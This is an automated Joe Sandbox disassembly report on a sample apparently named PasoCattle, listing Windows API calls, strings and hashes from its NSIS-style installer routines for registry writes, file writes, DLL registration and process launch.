                                                                                                                                                                          • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                                                                                                          APIs
                                                                                                                                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                                          • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                                          • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                          • String ID: F
                                                                                                                                                                          • API String ID: 941294808-1304234792
                                                                                                                                                                          • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                          • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                                                                                                          • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                          • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                                                                                                          APIs
                                                                                                                                                                          • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                                          • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                                          • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                          Strings
                                                                                                                                                                          • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                                          • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                                          • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                                          • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                                          • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                                          • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                                          • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                                          • API String ID: 1641139501-220328614
                                                                                                                                                                          • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                          • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                                                                                                          • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                          • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                                                                                                                          APIs
                                                                                                                                                                          • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                          • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                                                                                                          • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                                                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                                                                                                          • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                                                                                                          • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                                                                                                          • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                                          • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                          • API String ID: 3734993849-3206598305
                                                                                                                                                                          • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                          • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                                                                                                                          • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                          • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                                                                                                          APIs
                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                                          • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                                          • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                                          Strings
                                                                                                                                                                          • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                          • String ID: created uninstaller: %d, "%s"
                                                                                                                                                                          • API String ID: 3294113728-3145124454
                                                                                                                                                                          • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                          • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                                                                                                                          • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                          • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042A4AD,76E223A0,00000000), ref: 00404FD6
                                                                                                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042A4AD,76E223A0,00000000), ref: 00404FE6
                                                                                                                                                                            • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042A4AD,76E223A0,00000000), ref: 00404FF9
                                                                                                                                                                            • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                                                          Strings
                                                                                                                                                                          • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                                          • `G, xrefs: 0040246E
                                                                                                                                                                          • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                                          • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                                          • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                                                                                                          • API String ID: 1033533793-4193110038
                                                                                                                                                                          • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                          • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                                                                                                          • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                          • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                                                                                                          • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                                                                                                          • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                                                                                                          • GetSysColor.USER32(?), ref: 00403E57
                                                                                                                                                                          • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00403E81
                                                                                                                                                                          • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2320649405-0
                                                                                                                                                                          • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                          • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                                                                                                                          • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                          • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042A4AD,76E223A0,00000000), ref: 00404FD6
                                                                                                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042A4AD,76E223A0,00000000), ref: 00404FE6
                                                                                                                                                                            • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042A4AD,76E223A0,00000000), ref: 00404FF9
                                                                                                                                                                            • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                            • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                            • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                                          Strings
                                                                                                                                                                          • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                                          • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                                          • Exec: command="%s", xrefs: 00402241
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                                          • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                                          • API String ID: 2014279497-3433828417
                                                                                                                                                                          • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                          • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                                                                                                                          • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                          • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                                                                                          • GetMessagePos.USER32 ref: 0040489D
                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                                                                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Message$Send$ClientScreen
                                                                                                                                                                          • String ID: f
                                                                                                                                                                          • API String ID: 41195575-1993550816
                                                                                                                                                                          • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                          • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                                                                                                                          • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                          • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                                          • MulDiv.KERNEL32(00012C00,00000064,00103847), ref: 00403295
                                                                                                                                                                          • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                                                          Strings
                                                                                                                                                                          • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                          • String ID: verifying installer: %d%%
                                                                                                                                                                          • API String ID: 1451636040-82062127
                                                                                                                                                                          • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                          • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                                                                                                          • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                          • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                                                                                                          APIs
                                                                                                                                                                          • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                          • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                          • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
